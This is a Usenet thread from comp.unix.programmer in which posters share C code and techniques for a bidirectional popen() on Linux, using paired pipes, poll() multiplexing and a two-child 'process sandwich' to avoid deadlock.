In article <5ffc7e95$0$300$***@news.xs4all.nl>,
Casper H.S. Dik <***@OrSPaMcle.COM> wrote:
...
Post by Casper H.S. Dik
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
Yes, I read about p2open on Solaris (Oracle whatever they are calling it
now) and it looks quite useful. Any chance there is a publicly available
version of either it (specifically p2open()) or libgen in general for Linux?
--
Hindsight is (supposed to be) 2020.

Trumpers, don't make the same mistake twice.
Don't shoot yourself in the feet - and everywhere else - again!.
Kaz Kylheku
2021-01-12 21:19:56 UTC
Permalink
["Followup-To:" header set to comp.unix.programmer.]
Post by Kenny McCormack
...
Post by Casper H.S. Dik
In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.
Yes, I read about p2open on Solaris (Oracle whatever they are calling it
now) and it looks quite useful. Any chance there is a publicly available
version of either it (specifically p2open()) or libgen in general for Linux?
Here, I just made one.

#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>

typedef struct FILE_pair {
    FILE *in, *out;
    pid_t pid;
} FILE_pair;

static const FILE_pair error_pair = { NULL, NULL, -1 };

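FILE_pair popen_pair(const char *command)
{
    int in_pipe[2] = { -1, -1 }; /* from parent point of view */
    int out_pipe[2] = { -1, -1 };
    pid_t child = -1; /* tested below even when fork() was never reached */

    if (pipe(in_pipe) == 0 && pipe(out_pipe) == 0 && (child = fork()) != -1) {
        if (child != 0) {
            FILE_pair fp;

            /* close the child's ends in the parent, or EOF never arrives */
            close(in_pipe[1]);
            close(out_pipe[0]);
            in_pipe[1] = out_pipe[0] = -1;

            fp.in = fdopen(in_pipe[0], "r");
            fp.out = fdopen(out_pipe[1], "w");
            fp.pid = child;

            if (fp.in && fp.out) {
                /* make output line buffered so we don't have to fflush
                 * all the time
                 */
                setvbuf(fp.out, NULL, _IOLBF, 0);
                return fp;
            }

            if (fp.in) {
                fclose(fp.in);
                in_pipe[0] = -1; /* fclose() already closed the descriptor */
            }

            if (fp.out) {
                fclose(fp.out);
                out_pipe[1] = -1;
            }
        } else {
            /* read end of parent's output pipe is child's input */
            dup2(out_pipe[0], STDIN_FILENO);
            /* write end of parent's input pipe is child's output */
            dup2(in_pipe[1], STDOUT_FILENO);
            /* drop the originals so the command can see EOF on stdin */
            close(in_pipe[0]);
            close(in_pipe[1]);
            close(out_pipe[0]);
            close(out_pipe[1]);

            execl("/bin/sh", "/bin/sh", "-c", command, (char *) NULL);
            abort();
        }
    }

    if (child > 0) {
        kill(child, SIGKILL);
        waitpid(child, NULL, 0); /* reap it so no zombie is left behind */
    }
    close(in_pipe[0]);
    close(in_pipe[1]);
    close(out_pipe[0]);
    close(out_pipe[1]);
    return error_pair;
}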

int pclose_pair(FILE_pair fp)
{
    int wstatus, result = -1;
    fclose(fp.out);

    if (waitpid(fp.pid, &wstatus, 0) != -1) {
        if (WIFEXITED(wstatus))
            result = WEXITSTATUS(wstatus);
    }
    fclose(fp.in);
    return result;
}

int main(void)
{
    FILE_pair fp = popen_pair("read foo; printf '%s\\n' $foo");
    char buf[72]; // For posting this program to Usenet

    if (fp.out != NULL) {
        fputs("hello\n", fp.out);

        if (fgets(buf, sizeof buf, fp.in))
            fputs(buf, stdout);

        printf("pipe exit status = %d\n", pclose_pair(fp));
        return 0;
    }

    return EXIT_FAILURE;
}
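
The demo above exchanges one short line, so the deadlock raised earlier in the thread (each side blocked in write(), waiting for the other to read) cannot happen. With more data than fits in a pipe buffer it can. One option mentioned in the thread is select/poll multiplexing; here is a rough sketch with poll(). The name exchange_fds and its interface are invented for illustration, and it assumes raw pipe descriptors (for example straight from pipe()), not stdio streams, because it closes wfd itself.

```c
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: send in[0..in_len) to wfd while collecting up to
 * out_cap bytes from rfd. wfd is always closed before returning (as soon
 * as all input is sent, so the peer sees EOF). Returns the number of
 * bytes collected, or -1 on error. If the peer goes away early, write()
 * raises SIGPIPE unless the caller ignores that signal. */
ssize_t exchange_fds(int wfd, int rfd, const char *in, size_t in_len,
                     char *out, size_t out_cap)
{
    size_t sent = 0, got = 0;
    int eof = 0, failed = 0;
    int fl = fcntl(wfd, F_GETFL);

    /* non-blocking writes: a full pipe must not stall the reading side */
    if (fl == -1 || fcntl(wfd, F_SETFL, fl | O_NONBLOCK) == -1)
        failed = 1;

    while (!failed && !eof && got < out_cap) {
        struct pollfd pfd[2];
        ssize_t n;

        if (wfd != -1 && sent == in_len) {
            close(wfd);         /* all input delivered */
            wfd = -1;
        }
        pfd[0].fd = wfd;        /* poll() ignores negative descriptors */
        pfd[0].events = POLLOUT;
        pfd[0].revents = 0;
        pfd[1].fd = rfd;
        pfd[1].events = POLLIN;
        pfd[1].revents = 0;

        if (poll(pfd, 2, -1) == -1) {
            if (errno != EINTR)
                failed = 1;
            continue;
        }
        if (pfd[0].revents & (POLLOUT | POLLERR | POLLNVAL)) {
            n = write(wfd, in + sent, in_len - sent);
            if (n > 0)
                sent += (size_t)n;
            else if (n == -1 && errno != EAGAIN && errno != EINTR)
                failed = 1;
        }
        if (pfd[1].revents & (POLLIN | POLLHUP | POLLERR | POLLNVAL)) {
            n = read(rfd, out + got, out_cap - got);
            if (n > 0)
                got += (size_t)n;
            else if (n == 0)
                eof = 1;
            else if (errno != EINTR)
                failed = 1;
        }
    }

    if (wfd != -1)
        close(wfd);
    return failed ? -1 : (ssize_t)got;
}
```

Output beyond out_cap is simply not collected; a real caller would more likely grow the buffer.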
Philip Guenther
2021-01-12 19:19:13 UTC
Permalink
Post by Kenny McCormack
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
(*) This would be like the |& functionality in gawk.
P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...
--
"They say if you play a Microsoft CD backwards, you hear satanic messages.
Thats nothing, cause if you play it forwards, it installs Windows."
Philip Guenther
2021-01-15 04:13:55 UTC
Permalink
On Thursday, January 7, 2021 at 11:20:00 AM UTC-8, Kenny McCormack wrote:
...
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
One classic (i.e., "decades old") and portable inside POSIX technique that solves a large subset of this problem space is to use a process sandwich, where you create two pipes, then fork twice with one child execing the target utility after some fd swizzling, with the other child serving as the writer/source and the original process being the reader/sink**. This simplifies things whenever the writer and reader operations are not so tightly coupled as to need to share state, the key idea being that running the writer and reader in separate processes eliminates the deadlock issues.

(I suppose this can be 'simplified' by using only one pipe and fork for the writer and then popen() for the utility, but that requires more fd swizzling to set up the stdio for the popen() and revert it afterwards, and I've never seen this idiom written that way.)


This obviously doesn't work when the writer and reader share state. For example, if the process needs to run some non-trivial protocol over a TCP connection (like HTTP, or TLS) to receive the input and send back the output, possibly interleaved, then some way to share the necessary state across the fork would be necessary, which would probably be more complicated than just doing I/O multiplexing with poll() in one process.


Philip Guenther

** or the other way around, with the original process being the writer. The cases I've seen this used have all had the full input available from the start and wanted to carry on processing with the output, so making the writer the child was correct for them.
Kaz Kylheku
2021-01-15 08:24:10 UTC
Permalink
Post by Philip Guenther
...
Post by Kenny McCormack
Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).
One classic (i.e., "decades old") and portable inside POSIX technique
that solves a large subset of this problem space is to use a process
sandwich, where you create two pipes, then fork twice with one child
execing the target utility after some fd swizzling, with the other
child serving as the writer/source and the original process being the
reader/sink**.
E.g.

VAR=$(function | sort)

function runs in child process, sort in another, and the original
process captures the output, storing it in VAR.
--
TXR Programming Language: http://nongnu.org/txr